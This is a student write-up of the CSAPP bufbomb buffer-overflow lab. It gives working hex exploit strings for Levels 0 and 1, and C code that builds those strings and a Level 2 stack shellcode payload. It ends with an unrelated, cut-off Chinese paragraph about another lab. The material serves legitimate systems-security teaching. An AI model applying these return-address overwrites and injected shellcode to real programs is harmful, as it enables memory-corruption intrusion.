CSAPP: Six Important Labs, lab3

CSAPP && lab3

Level 2 & Level 3 unfinished, to be updated! : )

In this lab, you will gain firsthand experience with one of the methods commonly used to exploit security weaknesses in operating systems and network servers. Our purpose is to help you learn about the runtime operation of programs and to understand the nature of this form of security weakness so that you can avoid it when you write system code. We do not condone the use of these or any other form of attack to gain unauthorized access to any system resources. There are criminal statutes governing such activities.

Lab handout:

http://download.csdn.net/detail/u011368821/7920313

Lab materials:

http://download.csdn.net/detail/u011368821/7920335

The Exploits

There are three functions that you must exploit for this lab. The exploits increase in difficulty. For those of you looking for a challenge, there is a fourth function you can exploit for extra credit.

Level 0: Candle

When getbuf() executes its return statement, the program ordinarily resumes execution within function test(). Within the file bufbomb, there is a function smoke():

void smoke()
{
    entry_check(0); /* Make sure entered this function properly */
    printf("Smoke!: You called smoke()\n");
    validate(0);
    exit(0);
}

Your task is to get bufbomb to execute the code for smoke() when getbuf() executes its return statement, rather than returning to test(). You can do this by supplying an exploit string that overwrites the stored return pointer in the stack frame for getbuf() with the address of the first instruction in smoke. Note that your exploit string may also corrupt other parts of the stack state, but this will not cause a problem, because smoke() causes the program to exit directly.

Advice:

      • All the information you need to devise your exploit string for this level can be determined by examining a disassembled version of bufbomb.
      • Be careful about byte ordering.
      • You might want to use gdb to step the program through the last few instructions of getbuf() to make sure it is doing the right thing.
      • The placement of buf within the stack frame for getbuf() depends on which version of gcc was used to compile bufbomb. You will need to pad the beginning of your exploit string with the proper number of bytes to overwrite the return pointer. The values of
        these bytes can be arbitrary.
      • Check the line endings of your smoke.txt with hexdump -C smoke.txt.

Good grief, it took me several days of debugging to figure out how to use a "buffer overflow attack".

First build an input text file holding the bytes you want to send (the ones that do the overflowing).

Mine is:

exploit.txt

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 01 02 03 04 05 06 07 08 c0 10 40 00 00 00 00 00

Make sure there is no newline at the end here (if there is one it doesn't matter: open the generated file in vim, edit it and delete it).

In total this is 0x30 bytes + 8 bytes + 8 bytes == 0x40 bytes.

The first 0x30 bytes: because of (16-byte) stack alignment on the 64-bit build, the 36-byte array is padded out to a 0x30-byte slot in getbuf's frame! The content of these bytes is arbitrary.

The next 8 bytes are the value of %rbp that getbuf saved with push %rbp.

The last 8 bytes are the return address, the place we are "attacking"!

Take the machine's byte order into account.

The address of smoke is 0x4010c0, which as an 8-byte value is

00 00 00 00 00 40 10 c0

but since x86-64 is little-endian, the bytes written into the string must be

 c0 10 40 00 00 00 00 00

Record the generated bytes in exploit.byte.

Then feed that file to bufbomb as its input and you're done~ : )

Level 1: Sparkler

Basis for solving the problem:

/* $begin fizz-c */
void fizz(int arg1, char arg2, long arg3, char* arg4, short arg5, short arg6, unsigned long long val)
{
  entry_check(1);  /* Make sure entered this function properly */
  if (val == cookie) {
	printf("Fizz!: You called fizz(0x%llx)\n", val);
	validate(1);
  } else {
	printf("Misfire: You called fizz(0x%llx)\n", val);
  }
  exit(0);
}
/* $end fizz-c */

Similar to Level 0, your task is to get bufbomb to execute the code for fizz() rather than returning to test(). In this case, however, you must make it appear to fizz as if you have passed your cookie as its argument. You can do this by encoding your cookie in the appropriate place within your exploit string.

Advice:

Note that in x86-64, the first six arguments are passed in registers and additional arguments are passed on the stack. Your exploit code needs to write to the appropriate place within the stack.

You can use gdb to get the information you need to construct your exploit string. Set a breakpoint within getbuf() and run to this breakpoint. Determine parameters such as the address of global_value and the location of the buffer.

After corrupting the return address that test() pushed when it called getbuf, execution jumps to fizz. The task now requires the cookie to arrive as fizz's argument val. In the disassembly of fizz we find:

cmp 0x201296(%rip),%rsi

If the two operands are equal, execution jumps to 0x40109f and exits cleanly.

Hold on tight to that instruction. 0x201296(%rip) is the address of cookie (RIP-relative, so the address is computed from the address of the next instruction). The cmp compares the value stored there, the value at cookie's address, not the address itself, with %rsi. %rsi holds the value of val, which fizz loads from the stack just before the cmp: val is the seventh parameter, and on x86-64 the seventh and later arguments are passed on the stack, at 8(%rsp) on entry, directly above the return address. fizz pushes %rbp in its prologue, which is why it reads val from 0x10(%rsp). Only if the two values are equal does the function validate; otherwise all you will ever see is Misfire!

So the question is where %rsp points when fizz starts. getbuf's leaveq sets %rsp to the current %rbp and then pops the saved %rbp into %rbp (the saved value goes into %rbp, not into %rsp), and retq pops our overwritten return address. On entry to fizz, %rsp therefore points at the 8 bytes that follow the return-address slot in our string. fizz was reached by a ret rather than a call, but its code still assumes that 0(%rsp) holds its own return address and that val sits at 8(%rsp). The layout after the overwritten return address must therefore be: 8 arbitrary bytes (the slot fizz mistakes for its return address), then the 8-byte cookie in little-endian order. The value written over the saved %rbp (0x602320 below) only ends up in %rbp after leaveq; it plays no part in delivering the cookie and does no harm, because fizz never returns through that frame, it calls exit(0).

Here is my solution.

First look up the value at cookie's address, then input:

exploit_for_level1.txt

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 20 23 60 00 00 00 00 00 70 10 40 00 00 00 00 00 00 00 00 00 00 00 00 00 c2 46 c1 21 48 ca 33 39

Careful readers will notice that above the return address I filled another 8 bytes before putting in our answer.

That is because I honestly am not sure what sits above the return address, but I did it this way based on the disassembly, with testing and calculation.

Anyone interested can discuss with me how the registers change after the jump to fizz : ) [email protected]

Then feed exploit_for_level1.byte as the input.
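The Level 0 and Level 1 strings above were typed out by hand as hex. The following C program, added here as an example and not part of the original post or of the lab's tools, builds the same layouts from their components (pad, saved %rbp, little-endian return address, and for Level 1 the dummy return-address slot followed by the cookie) and converts hex text of the exploit.txt kind into raw bytes the way a hex2raw-style tool does. The addresses and the cookie are the ones quoted on this page (smoke 0x4010c0, fizz 0x401070, cookie 0x3933ca4821c146c2, a 0x30-byte buffer slot); they are specific to this build of bufbomb and to this cookie, so substitute your own.

```c
/* Added example, not code from the original post or from the bufbomb tools:
 * build the Level 0 and Level 1 exploit strings from their components and
 * convert hex text (exploit.txt) to raw bytes the way a hex2raw-style tool does.
 * Addresses, cookie and the 0x30-byte buffer slot are the values quoted on the
 * page; they are specific to this build of bufbomb and to this cookie. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <ctype.h>
#include <stdio.h>

#define SMOKE_ADDR 0x4010c0ULL             /* smoke(), from the page */
#define FIZZ_ADDR  0x401070ULL             /* fizz(), from the page */
#define COOKIE     0x3933ca4821c146c2ULL   /* the page's cookie (c2 46 c1 21 48 ca 33 39 in memory) */
#define BUF_SLOT   0x30                    /* 36-byte buf padded to 0x30 in getbuf's frame */

/* x86-64 is little-endian: 0x4010c0 is stored as c0 10 40 00 00 00 00 00. */
static void put_le64(uint8_t *p, uint64_t v) {
    for (int i = 0; i < 8; i++) p[i] = (uint8_t)(v >> (8 * i));
}
uint64_t get_le64(const uint8_t *p) {
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = (v << 8) | p[i];
    return v;
}

/* Layout of a getbuf overflow, low address first:
 *   [pad bytes (buf slot)][saved %rbp][return address][words the callee reads above its frame...]
 * Returns the number of bytes written. */
size_t build_payload(uint8_t *out, size_t pad, uint64_t saved_rbp, uint64_t ret_addr,
                     const uint64_t *stack_words, size_t n_words) {
    size_t off = 0;
    memset(out, 0, pad);                 /* content of the pad is arbitrary */
    off += pad;
    put_le64(out + off, saved_rbp);      /* overwrites the %rbp pushed by getbuf */
    off += 8;
    put_le64(out + off, ret_addr);       /* overwrites getbuf's return address */
    off += 8;
    for (size_t i = 0; i < n_words; i++) {
        put_le64(out + off, stack_words[i]);
        off += 8;
    }
    return off;
}

/* Level 0: only redirect getbuf's return into smoke(). */
size_t build_level0(uint8_t *out) {
    return build_payload(out, BUF_SLOT, 0x0807060504030201ULL, SMOKE_ADDR, NULL, 0);
}

/* Level 1: fizz is entered by getbuf's retq, not by a call, so after the retq
 * %rsp points just past our return address and fizz still assumes 0(%rsp) is
 * its own return address and the 7th argument val is at 8(%rsp).  Hence one
 * 8-byte dummy slot, then the cookie. */
size_t build_level1(uint8_t *out) {
    uint64_t words[2] = { 0, COOKIE };   /* dummy "return address", then val */
    return build_payload(out, BUF_SLOT, 0x602320ULL, FIZZ_ADDR, words, 2);
}

/* hex2raw-style conversion: "c0 10 40 00" -> bytes; whitespace and newlines are
 * skipped, so a trailing newline in the text file cannot leak into the bytes.
 * Returns the byte count, or -1 on a non-hex character, an odd number of digits,
 * or overflow of the output buffer. */
long hex_to_raw(const char *hex, uint8_t *out, size_t cap) {
    size_t n = 0;
    int have_hi = 0;
    uint8_t hi = 0;
    for (const char *p = hex; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (isspace(c)) continue;
        if (!isxdigit(c)) return -1;
        uint8_t d = (uint8_t)(isdigit(c) ? c - '0' : tolower(c) - 'a' + 10);
        if (!have_hi) { hi = d; have_hi = 1; continue; }
        if (n >= cap) return -1;
        out[n++] = (uint8_t)((hi << 4) | d);
        have_hi = 0;
    }
    return have_hi ? -1 : (long)n;
}

/* Print the Level 1 string as hex, 16 bytes per line, ready for exploit_for_level1.txt. */
int main(void) {
    uint8_t buf[128];
    size_t n = build_level1(buf);
    for (size_t i = 0; i < n; i++)
        printf("%02x%c", buf[i], ((i + 1) % 16 == 0 || i + 1 == n) ? '\n' : ' ');
    return 0;
}
```

Run it and diff the output against your hand-written file; the last 32 bytes of the Level 1 string must be fizz's address, eight filler bytes and the cookie, in that order and each in little-endian byte order. Because hex_to_raw skips whitespace, the "no trailing newline" worry above goes away when the conversion is done this way.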

Level 2: Firecracker

A much more sophisticated form of buffer attack involves supplying a string that encodes actual machine instructions. The exploit string then overwrites the return pointer with the starting address of these instructions. When the calling function (in this case getbuf) executes its ret instruction, the program will start executing the instructions on the stack rather than returning. With this form of attack, you can get the program to do almost anything. The code you place on the stack is called the exploit code. This style of attack is tricky, though, because you must get machine code onto the stack and set the return pointer to the start of this code.

For level 2, you will need to run your exploit within gdb for it to succeed. (attu has special memory protection that prevents execution of memory locations in the stack. Since gdb works a little differently, it will allow the exploit to succeed.)

Similar to Levels 0 and 1, your task is to get bufbomb to execute the code for bang() rather than returning to test(). Before this, however, you must set global variable global_value to your cookie. Your exploit code should set global_value, push the address of bang() on the stack, and then execute a retq instruction to cause a jump to the code for bang().

Advice:

Determining the byte encoding of instruction sequences by hand is tedious and prone to errors. You can let tools do all of the work by writing an assembly code file containing the instructions and data you want to put on the stack. Assemble this file with gcc and disassemble it with objdump. You should be able to get the exact byte sequence that you will type at the prompt. (A brief example of how to do this is included in the Generating Byte Codes section above.)

Keep in mind that your exploit string depends on your machine, your compiler, and even your cookie. Make sure your exploit string works on attu or your VM, and make sure you include your UWNetID on the command line to bufbomb.

Watch your use of address modes when writing assembly code. Note that movq $0x4, %rax moves the value 0x0000000000000004 into register %rax; whereas movq 0x4, %rax moves the value at memory location 0x0000000000000004 into %rax. Because that memory location is usually undefined, the second instruction will cause a segmentation fault!

Do not attempt to use either a jmp or a call instruction to jump to the code for bang(). These instructions use PC-relative addressing, which is very tricky to set up correctly. Instead, push an address on the stack and use the retq instruction.

Here I run into a problem when jumping to the buffer address... segmentation fault.

My attempt:

First, observe that when the cmp finds its operands equal, the program jumps and terminates safely.

The two things being compared are the value that 0x602320 points to (the cookie) and %rsi, which holds global_value.

The cookie's value is fixed at the moment we supply input; the only thing we can change here is the value at global_value (address 0x602308).

The ordinary approach can't do it.

Here we have to write a piece of attack code ourselves, in assembly.

In that code we assign the cookie's value to global_value; that is half the battle.

Then compile the code with gcc -c into an object file and look at the corresponding machine code with objdump.

For example, mov 0x602320,%rax corresponds to the machine code

48 8b 04 25 20 23 60 00

(the last four bytes are the 32-bit absolute address 0x602320 in little-endian order). No further explanation needed.

Worth mentioning: the code also contains

pushq $0x401020

and a retq (purpose explained shortly).

Then write this machine code into the buffer!

Think about it: if the return address I overwrite points to the start of buf, the instructions sitting in buf get executed.

When those instructions reach the end,

pushq $0x401020

retq

jumps to 0x401020 (the start of bang). bang runs, and since our attack code has already modified global_value, the result of the cmp is 0, je is taken, and the program terminates safely.

That is only my theoretical analysis; the problem I ran into is that jumping to the start of buf gives a segmentation fault...

Any expert passing by, please advise : )
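The exploit code and string for Level 2, as an added example that is not from the original post: a C program that emits the machine code for movq cookie,%rax / movq %rax,global_value / pushq $bang / retq (the same encodings that gcc -c followed by objdump produce), lays out the Level 2 string with the return address pointing at buf, and checks whether a process's stack is executable, since a jump into buf on a non-executable stack faults on the very first instruction fetch, which is why the handout says to run this level inside gdb. The cookie, global_value and bang addresses (0x602320, 0x602308, 0x401020) are the ones quoted on this page; BUF_ADDR is a placeholder for the address of buf that you read from gdb, because the page never gives it.

```c
/* Added example, not code from the original post: emit the Level 2 exploit code
 * and the string that carries it, and check the one condition that makes a jump
 * into buf fault before the first instruction runs (a non-executable stack).
 * cookie, global_value and bang addresses are the ones quoted on the page;
 * BUF_ADDR is a PLACEHOLDER for the address of buf read in gdb, which the page
 * does not give. The encodings are the ones gas/objdump produce. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define COOKIE_ADDR       0x602320ULL
#define GLOBAL_VALUE_ADDR 0x602308ULL
#define BANG_ADDR         0x401020ULL
#define BUF_ADDR          0x7fffffffe000ULL   /* placeholder: replace with &buf from gdb */
#define BUF_SLOT          0x30

static size_t put_le32(uint8_t *p, uint32_t v) {
    for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i));
    return 4;
}
static size_t put_le64(uint8_t *p, uint64_t v) {
    for (int i = 0; i < 8; i++) p[i] = (uint8_t)(v >> (8 * i));
    return 8;
}

/* movq addr,%rax -> 48 8b 04 25 <disp32>: REX.W, opcode 8b, ModRM 04 plus SIB 25
 * means "no base, no index, 32-bit absolute displacement". */
size_t emit_mov_abs_to_rax(uint8_t *p, uint32_t addr) {
    static const uint8_t op[] = {0x48, 0x8b, 0x04, 0x25};
    memcpy(p, op, sizeof op);
    return sizeof op + put_le32(p + sizeof op, addr);
}
/* movq %rax,addr -> 48 89 04 25 <disp32> (store form, opcode 89) */
size_t emit_mov_rax_to_abs(uint8_t *p, uint32_t addr) {
    static const uint8_t op[] = {0x48, 0x89, 0x04, 0x25};
    memcpy(p, op, sizeof op);
    return sizeof op + put_le32(p + sizeof op, addr);
}
/* pushq $imm32 -> 68 <imm32>, sign-extended to 64 bits, which is fine for 0x401020 */
size_t emit_push_imm32(uint8_t *p, uint32_t imm) {
    p[0] = 0x68;
    return 1 + put_le32(p + 1, imm);
}
/* retq -> c3 */
size_t emit_ret(uint8_t *p) { p[0] = 0xc3; return 1; }

/* The exploit code: global_value = cookie; then "return" into bang().
 * push + ret instead of jmp/call: both have absolute operands, so the code
 * works wherever buf happens to sit, with no PC-relative fixup to get right. */
size_t build_exploit_code(uint8_t *p) {
    size_t n = 0;
    n += emit_mov_abs_to_rax(p + n, (uint32_t)COOKIE_ADDR);
    n += emit_mov_rax_to_abs(p + n, (uint32_t)GLOBAL_VALUE_ADDR);
    n += emit_push_imm32(p + n, (uint32_t)BANG_ADDR);
    n += emit_ret(p + n);
    return n;                                  /* 22 bytes, well inside the 0x30 slot */
}

/* Level 2 string: [exploit code][filler to 0x30][saved %rbp][return address = &buf].
 * getbuf's retq lands on the first byte of buf, i.e. on the movq above. */
size_t build_level2(uint8_t *out, uint64_t buf_addr) {
    size_t n = build_exploit_code(out);
    memset(out + n, 0x90, BUF_SLOT - n);       /* nops; never reached, retq runs first */
    n = BUF_SLOT;
    n += put_le64(out + n, 0);                 /* saved %rbp: bang never returns through it */
    n += put_le64(out + n, buf_addr);
    return n;
}

/* Why the jump into buf faults outside gdb: if the [stack] mapping lacks the x
 * permission, fetching the first byte of buf as an instruction is a SIGSEGV.
 * Returns 1 if this process's stack is executable, 0 if not, -1 if unknown. */
int stack_is_executable(void) {
    FILE *f = fopen("/proc/self/maps", "r");
    if (!f) return -1;
    char line[512], perms[8] = "";
    int result = -1;
    while (fgets(line, sizeof line, f)) {
        if (strstr(line, "[stack]") && sscanf(line, "%*s %7s", perms) == 1) {
            result = (perms[2] == 'x');         /* e.g. "rw-p" vs "rwxp" */
            break;
        }
    }
    fclose(f);
    return result;
}

int main(void) {
    uint8_t s[128];
    size_t n = build_level2(s, BUF_ADDR);
    for (size_t i = 0; i < n; i++)
        printf("%02x%c", s[i], ((i + 1) % 16 == 0 || i + 1 == n) ? '\n' : ' ');
    printf("stack executable in this process: %d\n", stack_is_executable());
    return 0;
}
```

stack_is_executable() inspects the process it runs in, which tells you what the machine's default is; to check bufbomb itself, look at its [stack] line with info proc mappings from inside gdb, or cat /proc/<pid>/maps while it is stopped at a breakpoint. If the flags read rw-p, the jump into buf will always fault outside an environment that disables the protection, no matter how correct the bytes are.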

Time: 2024-11-09 16:57:37

[感受]: 这次操作系统实验感觉还是比较难的,除了因为助教老师笔误引发的2个错误外,还有一些关键性的理解的地方感觉还没有很到位,这些天一直在不断地消化.理解Lab3里的内容,到现在感觉比Lab2里面所蕴含的内容丰富很多,也算是有所收获,和大家分享一下我个人的一些看法与思路,如果有错误的话请指正. [关键函数理解]: 首先第一部分我觉得比较关键的是对于一些非常关键的函数的理解与把握,这些函数是我们本次实验的精华所在,虽然好几个实验都不需要我们自己实现,但是这些函数真的是非常厉害!有多厉害,呆会就知